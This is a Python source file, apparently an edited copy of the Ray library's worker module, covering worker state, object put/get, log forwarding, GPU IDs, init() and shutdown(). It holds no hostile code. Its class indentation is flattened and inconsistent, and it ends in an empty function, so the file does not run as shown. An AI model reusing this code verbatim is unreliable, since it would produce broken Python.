# Logger for this module. It should be configured at the entry point
# into the program using Ray. Ray provides a default configuration at
# entry/init points.
logger = logging.getLogger(__name__)
# Visible for testing.
def _unhandled_error_handler(e: Exception):
    """Log an error object whose result was never consumed by the application."""
    message = f"Unhandled error (suppress with RAY_IGNORE_UNHANDLED_ERRORS=1): {e}"
    logger.error(message)
class Worker:
"""A class used to define the control flow of a worker process.
Note:
The methods in this class are considered unexposed to the user. The
functions outside of this class are considered exposed.
Attributes:
node (ray.node.Node): The node this worker is attached to.
mode: The mode of the worker. One of SCRIPT_MODE, LOCAL_MODE, and
WORKER_MODE.
cached_functions_to_run (List): A list of functions to run on all of
the workers that should be exported as soon as connect is called.
"""
def __init__(self):
    """Initialize a Worker object."""
    # Node this worker is attached to; None until connected.
    self.node = None
    # One of SCRIPT_MODE / WORKER_MODE / LOCAL_MODE / ...; None until set_mode().
    self.mode = None
    # Functions queued via run_function_on_all_workers() before ray.init().
    self.cached_functions_to_run = []
    # Actor instances hosted by this worker process.
    self.actors = {}
    # When the worker is constructed. Record the original value of the
    # CUDA_VISIBLE_DEVICES environment variable.
    self.original_gpu_ids = ray._private.utils.get_cuda_visible_devices()
    self.memory_monitor = memory_monitor.MemoryMonitor()
    # A dictionary that maps from driver id to SerializationContext
    # TODO: clean up the SerializationContext once the job finished.
    self.serialization_context_map = {}
    self.function_actor_manager = FunctionActorManager(self)
    # This event is checked regularly by all of the threads so that they
    # know when to exit.
    self.threads_stopped = threading.Event()
    # Index of the current session. This number will
    # increment every time when `ray.shutdown` is called.
    self._session_index = 0
    # If this is set, the next .remote call should drop into the
    # debugger, at the specified breakpoint ID.
    self.debugger_breakpoint = b""
    # If this is set, ray.get calls invoked on the object ID returned
    # by the worker should drop into the debugger at the specified
    # breakpoint ID.
    self.debugger_get_breakpoint = b""
    # If True, make the debugger external to the node this worker is
    # running on.
    self.ray_debugger_external = False
    # Whether task definitions are loaded from the local filesystem.
    self._load_code_from_local = False
    # Used to toggle whether or not logs should be filtered to only those
    # produced in the same job.
    self.filter_logs_by_job = True
@property
def connected(self):
    """bool: True if Ray has been started and False otherwise."""
    return self.node is not None

@property
def node_ip_address(self):
    # IP address of the node this worker runs on; requires a live connection.
    self.check_connected()
    return self.node.node_ip_address

@property
def load_code_from_local(self):
    # Whether task definitions are loaded from the local filesystem.
    self.check_connected()
    return self._load_code_from_local

@property
def current_job_id(self):
    # Falls back to the nil id before the core worker exists.
    if hasattr(self, "core_worker"):
        return self.core_worker.get_current_job_id()
    return JobID.nil()

@property
def actor_id(self):
    # Nil unless this worker currently hosts an actor.
    if hasattr(self, "core_worker"):
        return self.core_worker.get_actor_id()
    return ActorID.nil()

@property
def current_task_id(self):
    return self.core_worker.get_current_task_id()

@property
def current_node_id(self):
    return self.core_worker.get_current_node_id()

@property
def namespace(self):
    # Logical namespace from the job config.
    return self.core_worker.get_job_config().ray_namespace

@property
def placement_group_id(self):
    return self.core_worker.get_placement_group_id()

@property
def worker_id(self):
    # Raw bytes of this worker's unique id.
    return self.core_worker.get_worker_id().binary()

@property
def should_capture_child_tasks_in_placement_group(self):
    return self.core_worker.should_capture_child_tasks_in_placement_group()

@property
def current_session_and_job(self):
    """Get the current session index and job id as pair."""
    assert isinstance(self._session_index, int)
    assert isinstance(self.current_job_id, ray.JobID)
    return self._session_index, self.current_job_id

@property
def runtime_env(self):
    """Get the runtime env in json format"""
    return json.loads(
        self.core_worker.get_job_config().runtime_env.raw_json)
def get_serialization_context(self, job_id=None):
    """Return (creating on demand) the SerializationContext for *job_id*.

    Defaults to the worker's current job. Access is guarded by self.lock
    because both `register_class_for_serialization` and the import thread
    reach this from different threads, and the creation path can recurse
    into this function again (hence the lock is an RLock).

    Args:
        job_id: The ID of the job that indicates which job to get
            the serialization context for.

    Returns:
        The serialization context of the given job.
    """
    if job_id is None:
        job_id = self.current_job_id
    with self.lock:
        ctx = self.serialization_context_map.get(job_id)
        if ctx is None:
            ctx = serialization.SerializationContext(self)
            self.serialization_context_map[job_id] = ctx
        return ctx
def check_connected(self):
    """Check if the worker is connected.

    When not connected and RAY_ENABLE_AUTO_CONNECT is not "0", connects
    transparently through the Ray client instead of raising.

    Raises:
        Exception: An exception is raised if the worker is not connected.
    """
    if not self.connected:
        if os.environ.get("RAY_ENABLE_AUTO_CONNECT", "") != "0":
            # Auto-connect is enabled (the default): start/join a cluster
            # lazily rather than forcing an explicit ray.init().
            ray.client().connect()
            return
        raise RaySystemError("Ray has not been started yet. You can "
                             "start Ray with 'ray.init()'.")
def set_mode(self, mode):
    """Set the mode of the worker.

    SCRIPT_MODE: this Worker is a driver run as a script or interactively in
    a shell; task-failure information is printed. WORKER_MODE: this Worker is
    not a driver and prints nothing about tasks. LOCAL_MODE: a driver that
    executes remote calls inline and blocking — serial Python for debugging.

    Args:
        mode: One of SCRIPT_MODE, WORKER_MODE, and LOCAL_MODE.
    """
    self.mode = mode

def set_load_code_from_local(self, load_code_from_local):
    """Toggle whether task code is loaded from the local filesystem."""
    self._load_code_from_local = load_code_from_local
def put_object(self, value, object_ref=None, owner_address=None):
    """Put value in the local object store with object reference `object_ref`.

    This assumes that the value for `object_ref` has not yet been placed in
    the local object store. If the plasma store is full, the worker will
    automatically retry up to DEFAULT_PUT_OBJECT_RETRIES times. Each
    retry will delay for an exponentially doubling amount of time,
    starting with DEFAULT_PUT_OBJECT_DELAY. After this, exception
    will be raised.

    Args:
        value: The value to put in the object store.
        object_ref (ObjectRef): The object ref of the value to be
            put. If None, one will be generated.
        owner_address: The serialized address of object's owner.

    Returns:
        ObjectRef: The object ref the object was put under.

    Raises:
        ray.exceptions.ObjectStoreFullError: This is raised if the attempt
            to store the object fails because the object store is full even
            after multiple retries.
    """
    # Make sure that the value is not an object ref.
    if isinstance(value, ObjectRef):
        raise TypeError(
            "Calling 'put' on an ray.ObjectRef is not allowed "
            "(similarly, returning an ray.ObjectRef from a remote "
            "function is not allowed). If you really want to "
            "do this, you can wrap the ray.ObjectRef in a list and "
            "call 'put' on it (or return it).")

    if self.mode == LOCAL_MODE:
        assert object_ref is None, ("Local Mode does not support "
                                    "inserting with an ObjectRef")

    # Serialize under the job's SerializationContext before handing the
    # payload to the core worker.
    serialized_value = self.get_serialization_context().serialize(value)
    # This *must* be the first place that we construct this python
    # ObjectRef because an entry with 0 local references is created when
    # the object is Put() in the core worker, expecting that this python
    # reference will be created. If another reference is created and
    # removed before this one, it will corrupt the state in the
    # reference counter.
    return ray.ObjectRef(
        self.core_worker.put_serialized_object(
            serialized_value,
            object_ref=object_ref,
            owner_address=owner_address))
def raise_errors(self, data_metadata_pairs, object_refs):
    """Deserialize error objects and route each through the unhandled-error hook."""
    errors = self.deserialize_objects(data_metadata_pairs, object_refs)
    if "RAY_IGNORE_UNHANDLED_ERRORS" in os.environ:
        return
    for error in errors:
        _unhandled_error_handler(error)
def deserialize_objects(self, data_metadata_pairs, object_refs):
    """Deserialize raw (data, metadata) pairs into Python objects.

    Runs under the function-actor-manager lock because the function actor
    manager or the import thread may call pickle.loads concurrently, which
    can lead to failed imports.
    TODO: We may be better off locking on all imports or injecting a lock
    into pickle.loads (https://github.com/ray-project/ray/issues/16304)
    """
    with self.function_actor_manager.lock:
        context = self.get_serialization_context()
        return context.deserialize_objects(data_metadata_pairs, object_refs)
def get_objects(self, object_refs, timeout=None):
    """Get the values in the object store associated with the IDs.

    Return the values from the local object store for object_refs. This
    will block until all the values for object_refs have been written to
    the local object store.

    Args:
        object_refs (List[object_ref.ObjectRef]): A list of the object refs
            whose values should be retrieved.
        timeout (float): The maximum amount of time in seconds to wait
            before returning; None means wait indefinitely, 0 means do
            not block.

    Returns:
        list: List of deserialized objects
        bytes: UUID of the debugger breakpoint we should drop
            into or b"" if there is no breakpoint.
    """
    # Make sure that the values are object refs.
    for object_ref in object_refs:
        if not isinstance(object_ref, ObjectRef):
            raise TypeError(
                f"Attempting to call `get` on the value {object_ref}, "
                "which is not an ray.ObjectRef.")

    # BUG FIX: `if timeout` treated timeout=0 ("do not block") the same as
    # None ("block forever"); only None should map to -1.
    timeout_ms = int(timeout * 1000) if timeout is not None else -1
    data_metadata_pairs = self.core_worker.get_objects(
        object_refs, self.current_task_id, timeout_ms)
    debugger_breakpoint = b""
    for (data, metadata) in data_metadata_pairs:
        if metadata:
            metadata_fields = metadata.split(b",")
            # The second metadata field may carry a debugger breakpoint id.
            if len(metadata_fields) >= 2 and metadata_fields[1].startswith(
                    ray_constants.OBJECT_METADATA_DEBUG_PREFIX):
                debugger_breakpoint = metadata_fields[1][len(
                    ray_constants.OBJECT_METADATA_DEBUG_PREFIX):]
    return self.deserialize_objects(data_metadata_pairs,
                                    object_refs), debugger_breakpoint
def run_function_on_all_workers(self, function,
                                run_on_other_drivers=False):
    """Run arbitrary code on all of the workers.

    This function will first be run on the driver, and then it will be
    exported to all of the workers to be run. It will also be run on any
    new workers that register later. If ray.init has not been called yet,
    then cache the function and export it later.

    Args:
        function (Callable): The function to run on all of the workers. It
            takes only one argument, a worker info dict. If it returns
            anything, its return values will not be used.
        run_on_other_drivers: The boolean that indicates whether we want to
            run this function on other drivers. One case is we may need to
            share objects across drivers.
    """
    # If ray.init has not been called yet, then cache the function and
    # export it when connect is called. Otherwise, run the function on all
    # workers.
    if self.mode is None:
        self.cached_functions_to_run.append(function)
    else:
        # Attempt to pickle the function before we need it. This could
        # fail, and it is more convenient if the failure happens before we
        # actually run the function locally.
        pickled_function = pickle.dumps(function)

        # Content-addressed id so identical functions export exactly once.
        function_to_run_id = hashlib.shake_128(pickled_function).digest(
            ray_constants.ID_SIZE)
        key = b"FunctionsToRun:" + function_to_run_id
        # First run the function on the driver.
        # We always run the task locally.
        function({"worker": self})
        # Check if the function has already been put into redis.
        # setnx doubles as an atomic "first exporter wins" lock.
        function_exported = self.redis_client.setnx(b"Lock:" + key, 1)
        if not function_exported:
            # In this case, the function has already been exported, so
            # we don't need to export it again.
            return

        check_oversized_function(pickled_function, function.__name__,
                                 "function", self)

        # Run the function on all workers.
        self.redis_client.hset(
            key,
            mapping={
                "job_id": self.current_job_id.binary(),
                "function_id": function_to_run_id,
                "function": pickled_function,
                "run_on_other_drivers": str(run_on_other_drivers),
            })
        self.redis_client.rpush("Exports", key)
        # TODO(rkn): If the worker fails after it calls setnx and before it
        # successfully completes the hset and rpush, then the program will
        # most likely hang. This could be fixed by making these three
        # operations into a transaction (or by implementing a custom
        # command that does all three things).
def main_loop(self):
"""The main loop a worker runs to receive and execute tasks."""
def sigterm_handler(signum, frame):
shutdown(True)
sys.exit(1)
ray._private.utils.set_sigterm_handler(sigterm_handler)
self.core_worker.run_task_loop()
sys.exit(0)
    def print_logs(self):
        """Prints log messages from workers on all nodes in the same job.

        Runs on a background thread until `self.threads_stopped` is set,
        forwarding records published on the Redis log channel to the
        driver-side stdstream dispatcher.
        """
        pubsub_client = self.redis_client.pubsub(
            ignore_subscribe_messages=True)
        pubsub_client.subscribe(ray.gcs_utils.LOG_FILE_CHANNEL)
        localhost = services.get_node_ip_address()
        try:
            # Keep track of the number of consecutive log messages that have
            # been received with no break in between. If this number grows
            # continually, then the worker is probably not able to process the
            # log messages as rapidly as they are coming in.
            num_consecutive_messages_received = 0
            job_id_binary = ray._private.utils.binary_to_hex(
                self.current_job_id.binary())
            while True:
                # Exit if we received a signal that we should stop.
                if self.threads_stopped.is_set():
                    return
                msg = pubsub_client.get_message()
                if msg is None:
                    # No message pending: reset the backlog counter and sleep
                    # briefly (interruptibly via the stop event) before
                    # polling again.
                    num_consecutive_messages_received = 0
                    self.threads_stopped.wait(timeout=0.01)
                    continue
                num_consecutive_messages_received += 1
                # Warn once per 100 uninterrupted messages that the driver
                # may be falling behind the workers' output.
                if (num_consecutive_messages_received % 100 == 0
                        and num_consecutive_messages_received > 0):
                    logger.warning(
                        "The driver may not be able to keep up with the "
                        "stdout/stderr of the workers. To avoid forwarding "
                        "logs to the driver, use "
                        "'ray.init(log_to_driver=False)'.")
                data = json.loads(ray._private.utils.decode(msg["data"]))
                # Don't show logs from other drivers.
                if (self.filter_logs_by_job and data["job"]
                        and job_id_binary != data["job"]):
                    continue
                data["localhost"] = localhost
                global_worker_stdstream_dispatcher.emit(data)
        except (OSError, redis.exceptions.ConnectionError) as e:
            logger.error(f"print_logs: {e}")
        finally:
            # Close the pubsub client to avoid leaking file descriptors.
            pubsub_client.close()
@PublicAPI
@client_mode_hook
def get_gpu_ids():
    """Get the IDs of the GPUs that are available to the worker.

    If the CUDA_VISIBLE_DEVICES environment variable was set when the worker
    started up, then the IDs returned by this method will be a subset of the
    IDs in CUDA_VISIBLE_DEVICES. If not, the IDs will fall in the range
    [0, NUM_GPUS - 1], where NUM_GPUS is the number of GPUs that the node has.

    Returns:
        A list of GPU IDs.
    """
    worker = global_worker
    worker.check_connected()

    if worker.mode != WORKER_MODE:
        logger.warning(
            "`ray.get_gpu_ids()` will always return the empty list when "
            "called from the driver. This is because Ray does not manage "
            "GPU allocations to the driver process.")

    # TODO(ilr) Handle inserting resources in local mode
    all_resource_ids = worker.core_worker.resource_ids()
    assigned_ids = set()
    # Fix: `import re` and the regex compilation previously happened inside
    # the loop body, re-running on every resource. Hoist both out so they
    # execute once per call.
    import re
    gpu_group_pattern = re.compile(r"^GPU_group_[0-9A-Za-z]+$")
    for resource, assignment in all_resource_ids.items():
        # Handle both normal and placement group GPU resources.
        # Note: We should only get the GPU ids from the placement
        # group resource that does not contain the bundle index!
        if resource == "GPU" or gpu_group_pattern.match(resource):
            for resource_id, _ in assignment:
                assigned_ids.add(resource_id)

    assigned_ids = list(assigned_ids)
    # If the user had already set CUDA_VISIBLE_DEVICES, then respect that (in
    # the sense that only GPU IDs that appear in CUDA_VISIBLE_DEVICES should
    # be returned).
    if worker.original_gpu_ids is not None:
        assigned_ids = [
            worker.original_gpu_ids[gpu_id] for gpu_id in assigned_ids
        ]

    # Give all GPUs in local_mode.
    if worker.mode == LOCAL_MODE:
        max_gpus = worker.node.get_resource_spec().num_gpus
        assigned_ids = worker.original_gpu_ids[:max_gpus]

    return assigned_ids
@Deprecated
def get_resource_ids():
    """Return the resources currently assigned to this worker.

    Returns:
        A dictionary mapping each resource name to a list of
        (resource id, fraction of that resource reserved for this worker)
        pairs.
    """
    current_worker = global_worker
    current_worker.check_connected()
    if _mode() == LOCAL_MODE:
        raise RuntimeError(
            "ray.worker.get_resource_ids() currently does not work in "
            "local_mode.")
    return current_worker.core_worker.resource_ids()
@Deprecated
def get_dashboard_url():
    """Return the URL of the Ray dashboard as a string.

    Note that the URL does not specify which node the dashboard is on.
    """
    current_worker = global_worker
    current_worker.check_connected()
    return _global_node.webui_url
global_worker = Worker()
"""Worker: The global Worker object for this worker process.
We use a global Worker object to ensure that there is a single worker object
per worker process.
"""
_global_node = None
"""ray.node.Node: The global node object that is created by ray.init()."""
@PublicAPI
@client_mode_hook
def init(
        address=None,
        *,
        num_cpus=None,
        num_gpus=None,
        resources=None,
        object_store_memory=None,
        local_mode=False,
        ignore_reinit_error=False,
        include_dashboard=None,
        dashboard_host=ray_constants.DEFAULT_DASHBOARD_IP,
        dashboard_port=None,
        job_config=None,
        configure_logging=True,
        logging_level=logging.INFO,
        logging_format=ray_constants.LOGGER_FORMAT,
        log_to_driver=True,
        namespace=None,
        runtime_env=None,
        # The following are unstable parameters and their use is discouraged.
        _enable_object_reconstruction=False,
        _redis_max_memory=None,
        _plasma_directory=None,
        _node_ip_address=ray_constants.NODE_DEFAULT_IP,
        _driver_object_store_memory=None,
        _memory=None,
        _redis_password=ray_constants.REDIS_DEFAULT_PASSWORD,
        _temp_dir=None,
        _lru_evict=False,
        _metrics_export_port=None,
        _system_config=None,
        _tracing_startup_hook=None,
        **kwargs):
    """
    Connect to an existing Ray cluster or start one and connect to it.

    This method handles two cases; either a Ray cluster already exists and we
    just attach this driver to it or we start all of the processes associated
    with a Ray cluster and attach to the newly started cluster.

    To start Ray locally and all of the relevant processes, use this as
    follows:

    .. code-block:: python

        ray.init()

    To connect to an existing local cluster, use this as follows (substituting
    in the appropriate port if needed).

    .. code-block:: python

        ray.init(address="localhost:6379")

    To connect to an existing remote cluster, use this as follows (substituting
    in the appropriate address). Note the addition of "ray://" at the beginning
    of the address.

    .. code-block:: python

        ray.init(address="ray://123.45.67.89:10001")

    More details for starting and connecting to a remote cluster can be found
    here: https://docs.ray.io/en/master/cluster/ray-client.html

    You can also define an environment variable called `RAY_ADDRESS` in
    the same format as the `address` parameter to connect to an existing
    cluster with ray.init() or ray.init(address="auto").

    Args:
        address (str): The address of the Ray cluster to connect to. If
            this address is not provided, then this command will start Redis,
            a raylet, a plasma store, a plasma manager, and some workers.
            It will also kill these processes when Python exits. If the driver
            is running on a node in a Ray cluster, using `auto` as the value
            tells the driver to detect the cluster, removing the need to
            specify a specific node address. If the environment variable
            `RAY_ADDRESS` is defined and the address is None or "auto", Ray
            will set `address` to `RAY_ADDRESS`.
            Addresses can be prefixed with a "ray://" to connect to a remote
            cluster. For example, passing in the address
            "ray://123.45.67.89:50005" will connect to the cluster at the
            given address.
        num_cpus (int): Number of CPUs the user wishes to assign to each
            raylet. By default, this is set based on virtual cores.
        num_gpus (int): Number of GPUs the user wishes to assign to each
            raylet. By default, this is set based on detected GPUs.
        resources: A dictionary mapping the names of custom resources to the
            quantities for them available.
        object_store_memory: The amount of memory (in bytes) to start the
            object store with. By default, this is automatically set based on
            available system memory.
        local_mode (bool): If true, the code will be executed serially. This
            is useful for debugging.
        ignore_reinit_error: If true, Ray suppresses errors from calling
            ray.init() a second time. Ray won't be restarted.
        include_dashboard: Boolean flag indicating whether or not to start the
            Ray dashboard, which displays the status of the Ray
            cluster. If this argument is None, then the UI will be started if
            the relevant dependencies are present.
        dashboard_host: The host to bind the dashboard server to. Can either be
            localhost (127.0.0.1) or 0.0.0.0 (available from all interfaces).
            By default, this is set to localhost to prevent access from
            external machines.
        dashboard_port(int, None): The port to bind the dashboard server to.
            Defaults to 8265 and Ray will automatically find a free port if
            8265 is not available.
        job_config (ray.job_config.JobConfig): The job configuration.
        configure_logging: True (default) if configuration of logging is
            allowed here. Otherwise, the user may want to configure it
            separately.
        logging_level: Logging level, defaults to logging.INFO. Ignored unless
            "configure_logging" is true.
        logging_format: Logging format, defaults to string containing a
            timestamp, filename, line number, and message. See the source file
            ray_constants.py for details. Ignored unless "configure_logging"
            is true.
        log_to_driver (bool): If true, the output from all of the worker
            processes on all nodes will be directed to the driver.
        namespace (str): Namespace to use
        runtime_env (dict): The runtime environment to use for this job.
        _enable_object_reconstruction (bool): If True, when an object stored in
            the distributed plasma store is lost due to node failure, Ray will
            attempt to reconstruct the object by re-executing the task that
            created the object. Arguments to the task will be recursively
            reconstructed. If False, then ray.ObjectLostError will be
            thrown.
        _redis_max_memory: Redis max memory.
        _plasma_directory: Override the plasma mmap file directory.
        _node_ip_address (str): The IP address of the node that we are on.
        _driver_object_store_memory (int): Deprecated.
        _memory: Amount of reservable memory resource to create.
        _redis_password (str): Prevents external clients without the password
            from connecting to Redis if provided.
        _temp_dir (str): If provided, specifies the root temporary
            directory for the Ray process. Defaults to an OS-specific
            conventional location, e.g., "/tmp/ray".
        _metrics_export_port(int): Port number Ray exposes system metrics
            through a Prometheus endpoint. It is currently under active
            development, and the API is subject to change.
        _system_config (dict): Configuration for overriding
            RayConfig defaults. For testing purposes ONLY.
        _tracing_startup_hook (str): If provided, turns on and sets up tracing
            for Ray. Must be the name of a function that takes no arguments and
            sets up a Tracer Provider, Remote Span Processors, and
            (optional) additional instruments. See more at
            docs.ray.io/tracing.html. It is currently under active development,
            and the API is subject to change.

    Returns:
        If the provided address includes a protocol, for example by prepending
        "ray://" to the address to get "ray://1.2.3.4:10001", then a
        ClientContext is returned with information such as settings, server
        versions for ray and python, and the dashboard_url. Otherwise,
        returns address information about the started processes.

    Raises:
        Exception: An exception is raised if an inappropriate combination of
            arguments is passed in.
    """
    # If available, use RAY_ADDRESS to override if the address was left
    # unspecified, or set to "auto" in the call to init
    address_env_var = os.environ.get(
        ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE)
    if address_env_var:
        if address is None or address == "auto":
            address = address_env_var
            logger.info(
                f"Using address {address_env_var} set in the environment "
                f"variable {ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE}")
    if address is not None and "://" in address:
        # Address specified a protocol, use ray client
        builder = ray.client(address)
        # Forward any keyword arguments that were changed from their default
        # values to the builder
        # NOTE(review): this loop reads locals()[argument_name] for each
        # parameter of init, so renaming any parameter of this function
        # would silently break the forwarding below.
        init_sig = inspect.signature(init)
        passed_kwargs = {}
        for argument_name, param_obj in init_sig.parameters.items():
            if argument_name in {"kwargs", "address"}:
                # kwargs and address are handled separately
                continue
            default_value = param_obj.default
            passed_value = locals()[argument_name]
            if passed_value != default_value:
                # passed value is different than default, pass to the client
                # builder
                passed_kwargs[argument_name] = passed_value
        passed_kwargs.update(kwargs)
        builder._init_args(**passed_kwargs)
        return builder.connect()
    if kwargs:
        # User passed in extra keyword arguments but isn't connecting through
        # ray client. Raise an error, since most likely a typo in keyword
        unknown = ", ".join(kwargs)
        raise RuntimeError(f"Unknown keyword argument(s): {unknown}")
    # Try to increase the file descriptor limit, which is too low by
    # default for Ray: https://github.com/ray-project/ray/issues/11239
    try:
        import resource
        soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
        if soft < hard:
            # https://github.com/ray-project/ray/issues/12059
            soft = max(soft, min(hard, 65536))
            logger.debug("Automatically increasing RLIMIT_NOFILE to max "
                         "value of {}".format(hard))
            try:
                resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
            except ValueError:
                logger.debug("Failed to raise limit.")
        soft, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
        if soft < 4096:
            logger.warning(
                "File descriptor limit {} is too low for production "
                "servers and may result in connection errors. "
                "At least 8192 is recommended. --- "
                "Fix with 'ulimit -n 8192'".format(soft))
    except ImportError:
        logger.debug("Could not import resource module (on Windows)")
        pass
    if runtime_env:
        # The runtime env, when given, is carried on the job config.
        if job_config is None:
            job_config = ray.job_config.JobConfig()
        job_config.set_runtime_env(runtime_env)
    # Convert hostnames to numerical IP address.
    # NOTE(review): _node_ip_address defaults to NODE_DEFAULT_IP, so
    # node_ip_address is assumed to always be bound here; an explicit None
    # override would leave it undefined below — confirm callers never pass
    # None.
    if _node_ip_address is not None:
        node_ip_address = services.address_to_ip(_node_ip_address)
    raylet_ip_address = node_ip_address
    if address:
        redis_address, _, _ = services.validate_redis_address(address)
    else:
        redis_address = None
    if configure_logging:
        setup_logger(logging_level, logging_format)
    if redis_address is not None:
        logger.info(
            f"Connecting to existing Ray cluster at address: {redis_address}")
    if local_mode:
        driver_mode = LOCAL_MODE
    else:
        driver_mode = SCRIPT_MODE
    if global_worker.connected:
        if ignore_reinit_error:
            logger.info(
                "Calling ray.init() again after it has already been called.")
            return
        else:
            raise RuntimeError("Maybe you called ray.init twice by accident? "
                               "This error can be suppressed by passing in "
                               "'ignore_reinit_error=True' or by calling "
                               "'ray.shutdown()' prior to 'ray.init()'.")
    _system_config = _system_config or {}
    if not isinstance(_system_config, dict):
        raise TypeError("The _system_config must be a dict.")
    global _global_node
    if redis_address is None:
        # In this case, we need to start a new cluster.
        ray_params = ray._private.parameter.RayParams(
            redis_address=redis_address,
            node_ip_address=node_ip_address,
            raylet_ip_address=raylet_ip_address,
            object_ref_seed=None,
            driver_mode=driver_mode,
            redirect_worker_output=None,
            redirect_output=None,
            num_cpus=num_cpus,
            num_gpus=num_gpus,
            resources=resources,
            num_redis_shards=None,
            redis_max_clients=None,
            redis_password=_redis_password,
            plasma_directory=_plasma_directory,
            huge_pages=None,
            include_dashboard=include_dashboard,
            dashboard_host=dashboard_host,
            dashboard_port=dashboard_port,
            memory=_memory,
            object_store_memory=object_store_memory,
            redis_max_memory=_redis_max_memory,
            plasma_store_socket_name=None,
            temp_dir=_temp_dir,
            # We need to disable it if runtime env is not set.
            # Uploading happens after core worker is created. And we should
            # prevent default worker being created before uploading.
            # TODO (yic): Have a separate connection to gcs client when
            # removal redis is done. The uploading should happen before this
            # one.
            start_initial_python_workers_for_first_job=(
                job_config is None or job_config.runtime_env is None),
            _system_config=_system_config,
            lru_evict=_lru_evict,
            enable_object_reconstruction=_enable_object_reconstruction,
            metrics_export_port=_metrics_export_port,
            tracing_startup_hook=_tracing_startup_hook)
        # Start the Ray processes. We set shutdown_at_exit=False because we
        # shutdown the node in the ray.shutdown call that happens in the atexit
        # handler. We still spawn a reaper process in case the atexit handler
        # isn't called.
        _global_node = ray.node.Node(
            head=True,
            shutdown_at_exit=False,
            spawn_reaper=True,
            ray_params=ray_params)
    else:
        # In this case, we are connecting to an existing cluster.
        # Cluster-shaping arguments are rejected because they only make
        # sense when this process starts the cluster itself.
        if num_cpus is not None or num_gpus is not None:
            raise ValueError(
                "When connecting to an existing cluster, num_cpus "
                "and num_gpus must not be provided.")
        if resources is not None:
            raise ValueError("When connecting to an existing cluster, "
                             "resources must not be provided.")
        if object_store_memory is not None:
            raise ValueError("When connecting to an existing cluster, "
                             "object_store_memory must not be provided.")
        if _system_config is not None and len(_system_config) != 0:
            raise ValueError("When connecting to an existing cluster, "
                             "_system_config must not be provided.")
        if _enable_object_reconstruction:
            raise ValueError(
                "When connecting to an existing cluster, "
                "_enable_object_reconstruction must not be provided.")
        # In this case, we only need to connect the node.
        ray_params = ray._private.parameter.RayParams(
            node_ip_address=node_ip_address,
            raylet_ip_address=raylet_ip_address,
            redis_address=redis_address,
            redis_password=_redis_password,
            object_ref_seed=None,
            temp_dir=_temp_dir,
            _system_config=_system_config,
            lru_evict=_lru_evict,
            enable_object_reconstruction=_enable_object_reconstruction,
            metrics_export_port=_metrics_export_port)
        _global_node = ray.node.Node(
            ray_params,
            head=False,
            shutdown_at_exit=False,
            spawn_reaper=False,
            connect_only=True)
    if driver_mode == SCRIPT_MODE and job_config:
        # Rewrite the URI. Note the package isn't uploaded to the URI until
        # later in the connect
        runtime_env_pkg.rewrite_runtime_env_uris(job_config)
    connect(
        _global_node,
        mode=driver_mode,
        log_to_driver=log_to_driver,
        worker=global_worker,
        driver_object_store_memory=_driver_object_store_memory,
        job_id=None,
        namespace=namespace,
        job_config=job_config)
    if job_config and job_config.code_search_path:
        global_worker.set_load_code_from_local(True)
    else:
        # Because `ray.shutdown()` doesn't reset this flag, for multiple
        # sessions in one process, the 2nd `ray.init()` will reuse the
        # flag of last session. For example:
        #     ray.init(load_code_from_local=True)
        #     ray.shutdown()
        #     ray.init()
        #     # Here the flag `load_code_from_local` is still True if we
        #     # doesn't have this `else` branch.
        #     ray.shutdown()
        global_worker.set_load_code_from_local(False)
    # Run any registered post-init callbacks now that the worker is
    # connected.
    for hook in _post_init_hooks:
        hook()
    node_id = global_worker.core_worker.get_current_node_id()
    return dict(_global_node.address_info, node_id=node_id.hex())
# Functions to run as callback after a successful ray init.
# Each hook is called with no arguments at the end of init().
_post_init_hooks = []
@PublicAPI
@client_mode_hook
def shutdown(_exiting_interpreter=False):
    """Disconnect the worker, and terminate processes started by ray.init().

    This will automatically run at the end when a Python process that uses Ray
    exits. It is ok to run this twice in a row. The primary use case for this
    function is to cleanup state between tests.

    Note that this will clear any remote function definitions, actor
    definitions, and existing actors, so if you wish to use any previously
    defined remote functions or actors after calling ray.shutdown(), then you
    need to redefine them. If they were defined in an imported module, then you
    will need to reload the module.

    Args:
        _exiting_interpreter (bool): True if this is called by the atexit hook
            and false otherwise. If we are exiting the interpreter, we will
            wait a little while to print any extra error messages.
    """
    if _exiting_interpreter and global_worker.mode == SCRIPT_MODE:
        # This is a duration to sleep before shutting down everything in order
        # to make sure that log messages finish printing.
        time.sleep(0.5)
    disconnect(_exiting_interpreter)
    # We need to destruct the core worker here because after this function,
    # we will tear down any processes spawned by ray.init() and the background
    # IO thread in the core worker doesn't currently handle that gracefully.
    if hasattr(global_worker, "gcs_client"):
        del global_worker.gcs_client
    if hasattr(global_worker, "core_worker"):
        global_worker.core_worker.shutdown()
        del global_worker.core_worker
    # Disconnect global state from GCS.
    ray.state.state.disconnect()
    # Shut down the Ray processes.
    global _global_node
    if _global_node is not None:
        # External storage (spilled objects) is only cleaned up by the head
        # node.
        if _global_node.is_head():
            _global_node.destroy_external_storage()
        _global_node.kill_all_processes(check_alive=False, allow_graceful=True)
        _global_node = None
    # TODO(rkn): Instead of manually resetting some of the worker fields, we
    # should simply set "global_worker" to equal "None" or something like that.
    global_worker.set_mode(None)
# Ensure a best-effort shutdown when the interpreter exits normally.
atexit.register(shutdown, True)


# TODO(edoakes): this should only be set in the driver.
def sigterm_handler(signum, frame):
    """Exit with the signal number as status so the cause is attributable."""
    sys.exit(signum)


try:
    ray._private.utils.set_sigterm_handler(sigterm_handler)
except ValueError:
    # Fix: the two string fragments previously concatenated to "mightnot"
    # (missing space at the join).
    logger.warning("Failed to set SIGTERM handler, processes might "
                   "not be cleaned up properly on exit.")
# Install a custom excepthook so that if the driver exits with an uncaught
# exception, the exception is recorded in the GCS worker table before the
# previously-installed hook runs.
normal_excepthook = sys.excepthook


def custom_excepthook(type, value, tb):
    """Record driver exceptions in the GCS worker table, then chain."""
    is_connected_driver = (global_worker.mode == SCRIPT_MODE
                           and hasattr(global_worker, "worker_id"))
    if is_connected_driver:
        formatted_tb = "".join(traceback.format_tb(tb))
        ray.state.state._check_connected()
        ray.state.state.add_worker(global_worker.worker_id,
                                   ray.gcs_utils.DRIVER,
                                   {"exception": formatted_tb})
    # Delegate to whichever excepthook was installed before ours.
    normal_excepthook(type, value, tb)


sys.excepthook = custom_excepthook
def print_to_stdstream(data):
    """Route one worker log record to stdout or stderr as appropriate."""
